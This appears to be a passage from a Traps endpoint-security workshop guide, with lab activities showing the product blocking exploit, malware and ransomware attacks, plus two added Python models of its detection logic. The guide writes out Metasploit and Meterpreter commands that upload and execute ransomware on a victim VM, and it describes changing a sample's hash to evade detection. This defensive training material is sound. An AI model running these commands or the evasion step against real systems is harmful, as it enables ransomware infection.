your endpoints, their corresponding verdicts, and other details about the files. When a security event occurs or
a specific file warrants investigation, you can review the WildFire Analysis Report, view which endpoints have
attempted to run the file, and if necessary, create an exception to override the official verdict.
Click on a file to get additional details, which endpoints have that file, WildFire verdict and any defined
exceptions.


Click the “Quarantine” tab to review any files previously quarantined. You can enable Traps to quarantine
malicious files on Windows endpoints as part of a Malware security profile. When malware attempts to run,
Traps automatically quarantines the file by moving it from a local or removable hard drive to a local quarantine
folder. This isolates the file and prevents it from causing any harm to your endpoints.

Step 3. Review Exceptions


Select the “Security” > “Exceptions” node.

In some cases, you may need to override the applied security policy to change whether Traps allows a
process or file to run on an endpoint. To override the security policy, you can configure any of the following
types of policy exceptions:
• Process Exception - Allow processes blocked by an exploit security module to run on an endpoint. You
can also disable all exploit protection modules for a process.
• Hash Exception - Explicitly define a verdict for a file (Benign or Malware). The Traps management service
distributes the verdict to all Traps agents that attempt to run the file. Traps will evaluate the verdict you
specify for the file instead of the WildFire verdict.
• Advanced Exceptions - Exceptions defined by Palo Alto Networks Support that can be used to temporarily
address policy issues for specific customers.

Click on an Exception entry to review the details.


Activity 5 - Prevent Exploit Attack

In this activity, you will:


• Attempt the same ransomware attack from our previous Activity, but this time with Traps
installed on the system
• Review Security Event on Traps management service

Task 1 - Attempt Ransomware Attack


In this task, we once again assume that you (as the victim) have received a spear phishing email from the
attacker that includes a link to the attacker’s listener service. However, you now have Traps installed on your
system. You happily click the link and activate the next stage of the attack. Because Traps is installed on the
Traps-Win1, it will prevent the ransomware attack by blocking its initial stage, which is the exploitation of
Adobe Flash Player.

Step 1. Access the Traps-Win1 Desktop and Verify Traps is Enabled


Click the “Traps-Win1” tab to access that desktop.
Note the date and time of the “Last Check-in” indicated on the bottom of the Traps-Win1 console.
Click the “Check In Now” link to reconnect to the Traps management service and retrieve any updated
security policies.
The link should change momentarily to “Connecting” and once the Traps-Win1 has completed the check-in
process, it should return to “Check In Now.”
Verify that Traps is active and that “Advanced Endpoint Protection is Enabled.”

You have now verified that Traps is running on the Traps-Win1 desktop.

Step 2. Verify that Attacker Systems Are Ready


Click the “Attacker” tab. This should display the Attacker Desktop.


Click inside the terminal window to activate it. Then press the “enter/return” key a few times to ensure it is
responding. If it is not, please reconnect to the Attacker desktop.
In the terminal window, type the following command at the prompt and press the “enter/return” key:
./demo.sh
This will load Metasploit, configure it to listen for incoming connections, and serve the Hacking Team Flash
zero-day exploit to the victim system. When Metasploit has completed loading, it should display the following
prompt:

“msf exploit(adobe_flash_hacking_team_uaf) >”

The attacker system is now ready and online, waiting for a connection from the victim system.

Step 3. Access the Traps-Win1 Desktop


Click the “Traps-Win1” tab to display that desktop. This should return you to the Traps-Win1 desktop with the
Traps console still visible.

Step 4. Access the Spear Phishing Email in Outlook


Click the Outlook icon to launch Outlook.

This Step repeats the same sequence of actions you completed to trigger the exploitation of the Victim VM in
the previous Activity. This is necessary to observe Traps in action.


Click the Outlook application window to activate it. The email with the subject line: “Someone has your
password” is displayed in the inbox.

Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login website.
Recall from our previous Activity that the Attacker server detects the incoming connection and serves the
SWF file for the Hacking Team zero-day exploit in reply to the request.
At this point, Traps will detect the exploitation attempt, block it, and display a dialog box to inform you that it
has prevented the security breach.

Traps freezes the Internet Explorer processes running in the browser tab, collects forensic data about the
attack, and then terminates the exploitation attempt.
Click the “Show Details” button in the Traps prevention alert window. Then scroll down to the bottom of the list
that appears. You will notice the “Component” referenced here is “DLL security”. In this case, the Exploit
Prevention Module triggered was from an attempt to leverage a DLL on the Traps-Win1 VM.


Click “OK” in the Traps notification dialog box to dismiss it. This will close the dialog box and terminate the
Internet Explorer process that was targeted by the exploitation attempt.

Step 5. Verify that Traps Has Prevented the Attack


Click the “Attacker” tab. This should display the Attacker desktop.
Notice that the Attacker’s system has detected the incoming request and served the SWF file that contains the
exploit, but failed to establish an active session to the Traps Client machine.

Click inside the Terminal window on the Attacker desktop and press “enter/return” a few times to get a new
Metasploit prompt: “msf exploit(adobe_flash_hacking_team_uaf) >”.
Enter the following command at the Metasploit prompt:
sessions
This should display a response indicating that there are no active sessions.
This verifies that the Attacker’s exploitation attempt failed, despite the fact that the SWF file containing the
Hacking Team Flash zero-day exploit was delivered to the Traps-Win1 machine.


Step 6. Exit Outlook on Traps-Win1


Click the “Traps-Win1” tab.
Close Outlook by clicking the “X” on the top-right corner of the window.

Task 2 – Review Traps Management Service


In this Task, you will review the Traps management service and the Security Event generated in the last
Task when Traps blocked the ransomware attack in its initial stage.

Step 1. Access Traps Management Service


In your browser, click the “TMS” tab on the Shortcut Menu.

Step 2. Review Dashboard


Select the “Dashboard” node.

The prevention event from the previous task is logged as a “Medium Severity” event. The number of events
will vary, determined by the selected Timeframe and how many others have performed this UTD.

Step 3. Review Security Event


Click the “Medium Severity” link on the Dashboard to be brought to the “Security Events” node with a filter in
place for your selected Timeframe and Severity.


You can further refine the filter by entering in the host name for your endpoint (e.g. jdoe-win1).
The prevention event was a “Memory Corruption Exploit” against iexplorer.exe. You can also see the Profile
type, Exploit, that was triggered, along with the endpoint name and user of that system.
Click on the Event link to bring up further details.

Review details of this event which includes the information from the “Security Event” overview. You will also
find additional details regarding the Module, Endpoint, Processes, Files and Users.
An administrator role can also “Retrieve and Analyze Data”. The results will be available in the “Analysis” tab
for this event. You can track its progress there as well as in the “Actions Tracker” node. Other actions are
“Retrieve Files”, “Initiate Live Terminal”, “Create Exception” and “Isolate Endpoint”.
Note: Your Viewer role does not have the ability to perform these actions.


Once the retrieval has completed, the analysis data is available for download.

End of Activity 5


Activity 6 - Prevent Malware Attack

In this activity, you will:


• Review Policy Rules and Profiles on Traps management service
• Attempt the ransomware attack from our previous Activity
• Explore the multi-method malware prevention mechanisms of Traps as they prevent the
ransomware attack

Task 1 – Review Policy Rules and Profiles


In this Task, you will review the Profiles assigned to your Traps-Win2 endpoint from the Policy Rules.

Step 1. Access Traps Management Service


In your browser, click the “TMS” tab on the Shortcut Menu.

Step 2. Review Assigned Profiles


Select the “Endpoints” > “Endpoints” node and click on your traps-win2 (e.g. jdoe-win2) endpoint.

Click the “Policy” tab to view the assigned policies.


As can be seen here, the Exploit Profile that is assigned is “no exploit protection” and the Malware Profile is
“allow temp and macro”. There is also a Restriction Profile of “blacklist folder”.

Step 3. Review Policy Rules


Select the “Security” > “Policy Rules” node.

Note that your traps-win2 endpoint belongs to the TrapsWin2group and has the same assigned profiles as
seen in the previous step.

Step 4. Review Profiles


Select the “Security” > “Profiles” node.

Click the “no exploit protection” profile to bring up the details for that profile.

Note that all Exploit Protection Modules have been disabled. This has been done to allow the Attacker system
to deliver the Hacking Team Flash zero-day exploit to your traps-win2 client. As was previously seen with
traps-win1, if exploit protection is in place, the attack will be stopped there. We will be demonstrating malware
protection in this Activity.


Click on the “allow temp and macro” profile to bring up the details for that profile.

This profile has default actions for the Malware Protection Module other than a Whitelist File (which will be
used later to demonstrate file and folder restrictions). This profile also has quarantine enabled.

Task 2 - Attempt to Execute Ransomware


In this Task, you will access the Attacker environment, upload the ransomware malware you have used in
previous activities to the Traps-Win2 environment, and attempt to execute the ransomware.

Step 1. Access the Traps-Win2 Desktop


Click the “Traps-Win2” tab to access that desktop. Make sure you are on Traps-Win2 for this Activity.
Click the “Check In Now” link to reconnect to the Traps management service and retrieve any updated
security policies.
The link should change momentarily to “Connecting” and once the Traps-Win2 has completed the check-in
process, it should return to “Check In Now.”

The “Anti-Exploit Protection” module should show that it is disabled (due to the “no exploit protection” profile).

Step 2. Access the Spear Phishing Email in Outlook


Click the Outlook icon to launch Outlook.

This Step repeats the same sequence of actions you completed to trigger the exploitation of the Victim VM in
the previous Activity. This is necessary to observe Traps in action.


Click the Outlook application window to activate it. The email with the subject line: “Someone has your
password” is displayed in the inbox.

Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login website.
Recall from our previous Activity that the Attacker server detects the incoming connection and serves the
SWF file for the Hacking Team zero-day exploit in reply to the request.
At this point, since Traps has the Exploit Protection Module disabled, the exploit will succeed, and the
ransomware attack can continue to its next stage.

Step 3. Verify that Attacker System is Ready


Click the “Attacker” tab to display the Attacker Desktop.
There should be a terminal window already open on the desktop, with Metasploit loaded and displaying
several entries indicating that weaponized SWF files were transmitted to the Traps-Win1 system. These
entries are the results of your attempt to activate the spear phishing email in the previous Activity.
The last entry in the Metasploit terminal window should indicate that a Meterpreter session was opened to the
Traps-Win2 system.


Click inside the terminal window to activate it. Then press the “enter/return” key a few times to get a Metasploit
prompt:

“msf exploit(adobe_flash_hacking_team_uaf) >”

At the Metasploit prompt, type the following command to verify that you have an active Meterpreter session to
the Victim Client system:
sessions
This will display a list of all active sessions currently running within Metasploit.
Note the “ID” of the active session with Traps-Win2. We will use session ID #1 for the instructions below, but
you should use the number that corresponds to your session ID.

Step 4. Initiate an Interactive Session with Traps-Win2


Initiate an interactive session with Traps-Win2 by entering the following command at the Metasploit prompt
(assuming your session ID is 1):
sessions -i 1
This will initiate the interactive session, display the message “Starting interaction with 1,” and change the
prompt to a Meterpreter prompt: “meterpreter>”
At this point, you have connected with the Traps Client and can now upload your ransomware sample to that
system.

Step 5. Upload the Ransomware to the Traps Client


The Petya ransomware that is part of this attack sequence already resides on the Attacker machine. Upload it
to the Traps Client by typing the following commands at the Meterpreter prompt:
cd /Windows
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Traps Client: “uploaded : happy.exe -> happy.exe”


We are now ready to launch our ransomware attack and infect Traps-Win2.

Step 6. Execute the Ransomware Malware on Traps-Win2


Enter the following command at the Meterpreter prompt:
execute -f happy.exe -H
At this point, Meterpreter should indicate that a new process was created and executed on the target system,
Traps-Win2.

Step 7. Observe Traps Malware Prevention (WildFire Inspection)

Click the “Traps-Win2” tab. This should display the Traps-Win2 desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps-Win2 machine.
The “Prevention Description” field should indicate Traps blocked this based on a “Suspicious executable
detected”. Click the “Show Details” button then scroll down to the bottom of the list. You will notice the
“Component” referenced here is “WildFire”

Click “OK” to dismiss the alert window.


Switch over to the Traps console by clicking its icon in the Windows Taskbar. Then click the “Events” tab in
the Traps console window (recall that we displayed this tab previously by clicking the “Advanced” link adjacent
to the “Status” tab). This will display all recent security events recorded on this system.
Click “Check In Now” to pull the event details from your Traps management service.
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per WildFire Module) and
terminated the process.


Now click the record that corresponds to that security event. This should display additional details about the
security event.

Note that in the “Details” window, it indicates that Traps quarantined the malware (as shown by the entry
“Quarantine: Yes”).
Since this malware has a file hash that is identified as a known malware in the WildFire threat intelligence
cloud (and now in the local cache of this Traps agent and the Traps management service), Traps will block it
every time it attempts to run.
In order to see the local Static Analysis prevention method, we need to create a malware sample with a file
hash that is unknown to both Traps and WildFire.

Task 3 - Create Unknown Malware


In this Task, you will change the file hash of our ransomware sample, “happy.exe” using a command line tool.
This will create a file that is essentially unknown to Traps and WildFire.
Click the “Attacker” tab. This will display the Attacker desktop with a terminal window already open with a
Meterpreter prompt. Since we will use this prompt once again in a few moments, we need to open a new
Terminal window.
Right-click the “Terminal” link on the very top of the Attacker desktop window, then select “New Terminal” from
the drop-down list. This will display a new Terminal window.
In the new Terminal window, type the following command to get a listing of all files in the root user’s home directory:
ls
The file “hashchange.sh” will be listed among the files in the root user’s home directory.
In the new Terminal window, type the following command to modify the file hash for the “happy.exe”
ransomware sample:
./hashchange.sh
This will display the 64-character hash value of the file “happy.exe,” add a small segment of random data to
the end of the file and display the new hash value for the modified file. Note the difference between the hash
values before and after the change.


This malware file is now essentially unknown to Traps and WildFire because it has a new file hash.
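As an added example (not part of this guide and not Traps' own code), the following Python models the two malware-prevention stages shown in Tasks 2 through 4 together with the Hash Exceptions reviewed in Activity 4: a hash-verdict stage (WildFire verdict, overridden by any Hash Exception) that appended trailing bytes defeat, and a hash-independent static stage that still flags the file. The PE-shaped blob, the verdict tables and the overlay heuristic standing in for Local Analysis are all constructed assumptions, not the product's real logic.

```python
import hashlib
import os
import struct

# Constructed model of a two-stage malware check. Stage 1 is a hash lookup
# (WildFire verdict or local cache, with Hash Exceptions taking precedence).
# Stage 2 is a static check that does not depend on the file hash; here it is a
# toy "appended overlay" heuristic standing in for the Local Analysis module.
# Real Local Analysis is far richer, and many legitimate installers carry
# overlays, so this heuristic alone would be noisy in production.


def build_minimal_pe(section_size: int = 64) -> bytes:
    """Constructed PE-shaped bytes (DOS header, PE signature, COFF header, one
    section). It is not a runnable executable, just enough for the parser."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    num_sections, size_opt_hdr = 1, 0
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    #              NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, num_sections, 0, 0, 0, size_opt_hdr, 0x0102)
    ptr_raw = e_lfanew + 4 + 20 + size_opt_hdr + 40 * num_sections
    # Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData,
    #   PointerToRawData, PtrToRelocs, PtrToLinenums, NumRelocs, NumLinenums, Characteristics
    sect = struct.pack("<8sIIIIIIHHI", b".text", section_size, 0x1000, section_size,
                       ptr_raw, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + sect + bytes(i & 0xFF for i in range(section_size))


def pe_raw_end(data: bytes) -> int:
    """Offset where the last raw section ends according to the PE section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (size_opt_hdr,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + size_opt_hdr
    end = table + 40 * num_sections  # headers alone, if there are no sections
    for i in range(num_sections):
        size_raw, ptr_raw = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, ptr_raw + size_raw)
    return end


def overlay_size(data: bytes) -> int:
    """Bytes trailing the last section: exactly what appending data to the
    end of the file (as the hash-change step does) leaves behind."""
    return max(0, len(data) - pe_raw_end(data))


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def append_trailing_bytes(data: bytes, n: int = 16) -> bytes:
    """Same program bytes, different file hash: the effect described in Task 3."""
    return data + os.urandom(n)


def hash_only_verdict(data: bytes, wildfire_verdicts: dict, hash_exceptions: dict) -> str:
    """Stage 1. A Hash Exception (Benign/Malware) is evaluated instead of the
    WildFire verdict; a hash with no entry anywhere is 'unknown'."""
    h = sha256_hex(data)
    if h in hash_exceptions:
        return hash_exceptions[h]
    return wildfire_verdicts.get(h, "unknown")


def evaluate(data: bytes, wildfire_verdicts: dict, hash_exceptions: dict):
    """Full chain: hash stage first, static stage only for unknown files.
    Returns (action, component) mirroring the alert's 'Component' field."""
    verdict = hash_only_verdict(data, wildfire_verdicts, hash_exceptions)
    if verdict == "Malware":
        return ("block", "WildFire")
    if verdict == "Benign":
        return ("allow", "WildFire")
    if overlay_size(data) > 0:  # toy heuristic standing in for Local Analysis
        return ("block", "Local Analysis")
    return ("allow", "Local Analysis")


if __name__ == "__main__":
    original = build_minimal_pe()
    modified = append_trailing_bytes(original)
    verdicts = {sha256_hex(original): "Malware"}  # constructed: sample already known
    print("hash changed:", sha256_hex(original) != sha256_hex(modified))
    print("hash-only verdict, modified file:", hash_only_verdict(modified, verdicts, {}))
    print("full chain, modified file:", evaluate(modified, verdicts, {}))
    # A Hash Exception marking the original Benign overrides the WildFire verdict.
    print("with Benign exception:", evaluate(original, verdicts, {sha256_hex(original): "Benign"}))
```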

Task 4 - Attempt to Run Ransomware Again


In this Task, you will upload the ransomware malware you created in the previous Task to Traps-Win2
environment and attempt to execute the ransomware.

Step 1. Upload Modified Ransomware to the Traps-Win2


In the Attacker desktop window, click inside the initial terminal window that still displays the Meterpreter
prompt (“meterpreter >”). This window should still be visible under the new Terminal window that you used in
the previous Task to modify the ransomware sample.
Upload the modified ransomware sample you created in the previous Task to the Traps Client by typing the
following commands at the Meterpreter prompt:
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Traps Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our new ransomware with an unknown file hash to infect the Traps Client.

Step 2. Execute the Ransomware Malware on Traps-Win2


Enter the following command at the Meterpreter prompt:
execute -f happy.exe -H
At this point, Meterpreter should indicate that a new process was created and executed on the target system,
Traps Client.

Step 3. Observe Traps Malware Prevention (Static Analysis)


Click the “Traps-Win2” tab. This should display the Traps-Win2 desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps Client machine.


The “Prevention Description” field should again indicate Traps blocked based on a “Suspicious executable
detected”. Click the “Show Details” button then scroll down to the bottom of the list. You will notice the
“Component” referenced here this time is “Local Analysis”

Click “OK” to dismiss the alert window.


If the Traps console is not visible on the desktop, bring it to the forefront by clicking its icon in the Windows
Taskbar. Then click the “Events” tab in the Traps console window. This will display all recent security events
recorded on this system.
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per Local Analysis Module) and
terminated the process.
Click “Check In Now” to pull the event from your Traps management service.
Now click the record that corresponds to that security event. This should display additional details about the
security event.


Note that the “Details” window indicates that Traps quarantined the malware (as shown by the entry
“Quarantine: Yes”).

Step 4. Review WildFire Malware Security Event on Traps Management Service


Click the “TMS” tab to access that environment. This should display the Traps management service.
Click the “Security” > “Security Events” node. Filter by your endpoint name to show just your events.

Notice the file “happy.exe” among the first couple of entries in this table, along with the Event and the
Malware Profile Type.
You can see that the older event was blocked as known “WildFire Malware”. Click the event to bring up more
details.


Review the details, including the Module, Endpoint, Process, Files and Users sections. Note, from the Module
section, that the WildFire module blocked the process and quarantined the file.
You can also click on the “WildFire” tab to display the details regarding this sample, which was already known
to WildFire. You will see more in the next Step.

Step 5. Review Local Analysis Malware Security Event on Traps Management Service
Click the “Local Analysis Malware” event to bring up more details.

Review the details, including the Module, Endpoint, Process, Files and Users sections. Note, from the Module
section, that the Local Analysis module blocked the process and quarantined the file.
Click the “WildFire” tab. As this sample was previously unknown to WildFire, it was uploaded and analyzed.
Once WildFire has completed this, it will render a verdict and transmit that back to the Traps management
service. That verdict will be visible in this section.


Depending on how much time has passed, you may see its analysis still in progress.

When WildFire has completed the analysis, the verdict will be shown.

You will revisit this event later; if WildFire has not yet returned a verdict, please proceed to the next task.


Task 5 – Attempt to Run Ransomware from Restricted Directory


In this Task, you will attempt to execute the ransomware from a restricted directory.

Step 1. Review Profiles


Recall from Task 2 that the Malware Profile assigned is “allow temp and macro”. Your traps-win2 VM was also
assigned the Restriction Profile of “blacklist folder”. You may review these by going to Endpoints > Endpoints
> traps-win2 (e.g. jdoe-win2) > Policy or Security > Policy Rules > TrapsWin2group.
While still in the Traps management service, select the “Security” > “Profiles” node. Select “allow temp and
macro” to bring up the details of that Profile. Scroll down to see the “Whitelist Files” section.

Note that “c:\temp\happy.exe” is being allowed here. This will disable WildFire and Local Analysis protections
and allow your Restriction Profile to be evaluated. If this was not in place, Traps would stop the ransomware
executed from that directory as you experienced in the previous Task.
Again, from the “Profiles” node, select “blacklist folder” to bring up the details for it.

Note that the “Action mode” is set to “Block”. The “Blacklist Files / Folders” is set to “c:\temp\happy.exe”. This
will prevent the execution of happy.exe from “c:\temp\”.

Step 2. Create a Temp Directory on the Traps-Win2


Click the “Attacker” tab to access that desktop window.
Click inside the initial terminal window that still displays the Meterpreter prompt (“meterpreter >”). Next, hit the
“enter/return” key a few times to make sure your session is still active.
Create the new directory “C:\temp” on the Traps Client machine by entering the following commands at the
Meterpreter prompt in sequence (and hitting the “enter/return” key after each command):


cd /
mkdir temp
cd temp

Step 3. Upload Modified Ransomware to Traps-Win2


Now upload the modified ransomware sample you created in the previous Task to the Traps-Win2 by typing
the following commands at the Meterpreter prompt:
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Traps Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our new ransomware with an unknown file hash to infect the Traps-Win2.

Step 4. Execute the Ransomware Malware on Traps-Win2


Enter the following command at the Meterpreter prompt:
execute -f happy.exe -H
At this point, Meterpreter should indicate that a new process was created and executed on the target system,
Traps-Win2.

Step 5. Observe Traps Malware Prevention (Execution Restrictions)


Click the “Traps-Win2” tab. This should display the Traps-Win2 desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps-Win2 machine.
The “Prevention Description” field indicates that Traps blocked an “Attempted execution from a restricted
folder.”

If you recall our review of the Restrictions policy, Traps was programmed to prevent execution of programs
from the “c:\temp” directory. This is precisely what happened in this Step.
Click “OK” to dismiss the alert window.
If the Traps console is not visible on the desktop, bring it to the forefront by clicking its icon in the Windows
Taskbar. Then click the “Events” tab in the Traps console window.


Click “Check In Now” to pull the event details from your Traps management service.
Note the first line of this list. It should indicate that Traps blocked “happy.exe” (per Execution Protection
Module) and terminated the process.
Now click the record that corresponds to that security event. This should display additional details about the
security event.

Note that the “Details” window indicates that Traps did not quarantine the malware (as shown by the entry
“Quarantine: No”), because it was not specifically identified as malware.

Step 6. Clean Up the Environment


Close Internet Explorer, and Outlook by clicking the “X” on the top-right corner of each window.
Click the “Attacker” tab to display that desktop environment.
Next, click inside the Terminal window that should still be displaying the Meterpreter prompt (“meterpreter >”).
Hit the “enter/return” key a few times to display a new prompt. The Meterpreter session should have
automatically terminated (since you shut down Internet Explorer in the Traps Client environment).
At the Metasploit prompt (“msf exploit(adobe_flash_hacking_team_uaf) >”), type the following commands,
hitting the “enter/return” key after each:
exit
clear

Step 7. Review Security Event on Traps Management Service


Click the “TMS” tab to access that environment.
Click the “Security” > “Security Events” node. Filter by your endpoint name to show just your events. If you are
still filtering “Severity” for “Medium”, change the filter by clicking each of the severity icons.

Note the most recent event is “Execution From a Restricted Folder”. You may click that event to get further
details.

End of Activity 6

Activity 7 - Security Operating Platform in Action

In this activity, you will:


• Learn how the Palo Alto Networks Next-Generation Security Platform automates prevention
• Validate that the threat intelligence gained from Traps preventions results in new prevention
capabilities automatically programmed into the firewall

Task 1 - Review the Security Operating Platform


Review the Palo Alto Networks Security Operating Platform with your workshop instructor.

Task 2 - Review Ransomware Attack Progression


In this Task, you will review the threat intelligence that Traps has gathered so far from your actions in previous
Activity tasks.

Step 1. Verify Ransomware Upload to WildFire


In the last set of tasks of the previous Activity, you used a command-line tool to modify the ransomware
executable “happy.exe” to create a new malware sample with a file hash that was unknown to both Traps and
WildFire.
The local Static Analysis check in Traps correctly blocked this newly modified ransomware, quarantined the
file, and transmitted the file to WildFire for full analysis.

Click the “TMS” tab to access that desktop environment.


Select the “Security” > “Security Events” node.
Notice “happy.exe” among the first few entries in this table. Click the “Local Analysis Malware” event and then
select the “WildFire” tab.
The Traps management service upload of this malware to WildFire should have been completed at this point,
as indicated by the verdict being present. Note, if you have worked through the tasks quickly, the verdict may
not be available. Please recheck after a couple of minutes.

Step 2. Retrieve WildFire Report


Click the “Download WildFire analysis report (PDF)” button to download the report.

When prompted, confirm that “Open with” is set to “SumatraPDF” and then click “OK”.

The browser will download the report and then open it in the PDF viewer.
Review the WildFire report to learn more about the types of information WildFire reveals through its full
analysis of the ransomware file.

When done, exit the application.


The threat intelligence gained through the WildFire analysis will have automatically reprogrammed the Next-
Generation Firewall in the UTD environment to prevent access to the malware file.

Task 3 - Retrieve Ransomware Through Firewall


In this Task, you will retrieve the modified ransomware file through the Next-Generation Firewall that is
deployed in the UTD environment.

Step 1. Transfer Ransomware to Web Server


For this step, we will use the web server that is located on the Attacker system. The Attacker system is
equipped with a separate network interface that is routed through the Next-Generation Firewall, so the firewall
will evaluate and secure any requests directed to the web server through this interface.
Click the “Attacker” tab to display that desktop environment.
Next, click inside either of the terminal windows that are currently open on the Attacker desktop system, and
type the following command to transfer “happy.exe” to the root directory of the web server:
cp happy.exe /var/www/ngfw/

Step 2. Verify Ransomware Transfer to Web Server


Click the “Traps-Win2” tab to display that desktop environment.
Next, launch Internet Explorer by clicking its icon in the Windows Taskbar.
Finally, click the “Web Server” shortcut on the Favorites bar of Internet Explorer to access the root directory of
the web server. This should display the index of the web server files, including “happy.exe.”

Step 3. Attempt to Retrieve the Ransomware File


In the list of files from the web server that are displayed in the browser, click the name of our ransomware file,
“happy.exe.”
The browser should now display a message stating that “Virus/Spyware Download Blocked” and identify the
file that you attempted to download, “happy.exe.”

This verifies that when Traps encountered an unknown malware (the modified ransomware) and submitted it
to WildFire for analysis, the threat intelligence gained from that analysis automatically reprogrammed the
Next-Generation Firewall in the UTD environment to block the transfer of the file through the firewall.
Close Internet Explorer by clicking the “X” on the top-right corner of that window. If Outlook is still open, close
it as well.
End of Activity 7

Activity 8 – Anti-Ransomware Protection

In this activity, you will:


• Experience a file-based ransomware attack on Victim VM
• Attempt file-based ransomware attack on Traps Client

Task 1 – Review Anti-Ransomware Protection Module


The Anti-Ransomware Protection module provides additional protection against ransomware. The module
targets encryption-based activity associated with ransomware with the ability to analyze and halt ransomware
activity before any data loss occurs.
In a ransomware attack, the attacker typically uses DLLs, macros, shell scripts and other methods to encrypt
important data. The attacker can then hold the data hostage until the user pays a ransom to unlock it. To
combat these attacks, Traps analyzes common ransomware behavior to prevent the ransomware from
encrypting and holding files hostage.
This behavior-based protection is an additional layer of prevention to the pre-existing malware and exploit
prevention capabilities.

Task 2 – Execute Ransomware on Victim


Our previous ransomware attack used Petya, which encrypted the MBR (master boot record). In this task, we
will be using the Gryphon ransomware, which restricts access to data by encrypting individual files.
Step 1. Access Victim Desktop
Click “Victim Client” tab and switch over to RDP.

Step 2. Exit Outlook Client


Exit the Outlook client by clicking the red “X”.

Step 3. Launch Ransomware


From the “Victim Client” desktop, double-click the “OnlineGames” executable.

Step 4. Observe attack


It may take up to 5 minutes for the effects of the attack to become noticeable. Once the Gryphon ransomware
has finished encrypting files, it will launch Notepad with the ransom note.

Notice that even the folder on the desktop has been encrypted. All files encrypted will have the extension
“[chines34@protonmail.ch].gryphon”.
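The kind of file-activity pattern that behavior-based ransomware protection (Task 1) looks for, as an added example that is not Traps code: a toy monitor that blocks a process once it has overwritten several existing files with high-entropy data and renamed them with an appended extension, here the Gryphon extension seen in Step 4. The event format, thresholds, process names and sample activity are all constructed for this illustration; the real Anti-Ransomware module's logic is not documented here and differs.

```python
# Added example (not Traps code): a behaviour-based ransomware detector over
# a constructed stream of file events. Thresholds and sample data are made up.
import math
import random
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

RANSOM_EXT = "[chines34@protonmail.ch].gryphon"   # extension observed in the Gryphon lab
ENTROPY_BITS = 7.0    # overwritten content at least this random is treated as encrypted
MAX_VICTIMS = 3       # block the process once this many files show the full pattern


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; plain text sits around 4-5, encrypted or compressed data near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


@dataclass
class FileEvent:
    pid: int
    image: str
    op: str               # "write" or "rename"
    path: str
    data: bytes = b""     # payload for "write"
    new_path: str = ""    # target for "rename"


@dataclass
class Verdict:
    pid: int
    image: str
    event_index: int      # position in the stream at which the block decision is made
    victims: List[str]    # files already overwritten and renamed by that process


class RansomwareMonitor:
    def __init__(self) -> None:
        self.high_entropy_writes: Dict[int, Set[str]] = defaultdict(set)  # pid -> overwritten paths
        self.victims: Dict[int, List[str]] = defaultdict(list)

    def observe(self, index: int, ev: FileEvent) -> Optional[Verdict]:
        if ev.op == "write" and shannon_entropy(ev.data) >= ENTROPY_BITS:
            self.high_entropy_writes[ev.pid].add(ev.path)
        elif ev.op == "rename":
            # Pattern: an existing file was first overwritten with random-looking
            # bytes and is now renamed with an extra extension appended.
            appended = ev.new_path.startswith(ev.path) and ev.new_path != ev.path
            if appended and ev.path in self.high_entropy_writes[ev.pid]:
                self.victims[ev.pid].append(ev.path)
                if len(self.victims[ev.pid]) >= MAX_VICTIMS:
                    return Verdict(ev.pid, ev.image, index, list(self.victims[ev.pid]))
        return None


def build_sample_events() -> List[FileEvent]:
    """Constructed activity: a benign edit, an archive write, then the ransomware loop."""
    rng = random.Random(7)
    junk = lambda: bytes(rng.randrange(256) for _ in range(4096))   # stands in for ciphertext
    desk = r"C:\Users\victim\Desktop"
    events = [
        FileEvent(1000, "winword.exe", "write", desk + r"\report.docx", b"Quarterly report text " * 200),
        FileEvent(1000, "winword.exe", "rename", desk + r"\report.docx", new_path=desk + r"\report_v2.docx"),
        FileEvent(2000, "7z.exe", "write", desk + r"\backup.7z", junk()),   # high entropy, but nothing renamed
    ]
    for name in ["budget.xlsx", "thesis.docx", "photo.jpg", "notes.txt", "keys.pdf"]:
        path = f"{desk}\\{name}"
        events.append(FileEvent(4242, "OnlineGames.exe", "write", path, junk()))
        events.append(FileEvent(4242, "OnlineGames.exe", "rename", path, new_path=f"{path}.{RANSOM_EXT}"))
    return events


def run_sample() -> Optional[Verdict]:
    """Feed the stream to the monitor and stop at the first block decision."""
    monitor = RansomwareMonitor()
    for index, ev in enumerate(build_sample_events()):
        verdict = monitor.observe(index, ev)
        if verdict:
            return verdict
    return None
```

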